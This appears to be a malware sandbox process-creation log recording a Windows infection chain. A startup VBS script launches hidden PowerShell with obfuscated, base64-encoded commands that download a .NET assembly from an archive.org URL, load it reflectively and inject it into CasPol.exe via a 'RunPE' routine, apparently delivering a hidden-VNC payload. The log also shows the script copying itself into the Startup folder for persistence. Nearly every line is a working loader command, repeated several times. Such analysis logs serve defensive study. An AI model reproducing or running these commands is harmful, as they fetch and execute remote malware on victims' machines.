dYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
